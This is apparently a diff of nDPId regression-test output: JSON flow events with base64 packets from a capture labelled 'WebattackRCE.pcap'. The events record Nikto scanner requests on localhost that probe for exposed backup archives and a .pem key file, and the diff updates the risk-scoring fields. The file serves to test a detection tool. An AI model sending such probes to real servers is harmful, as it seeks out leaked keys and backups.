-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
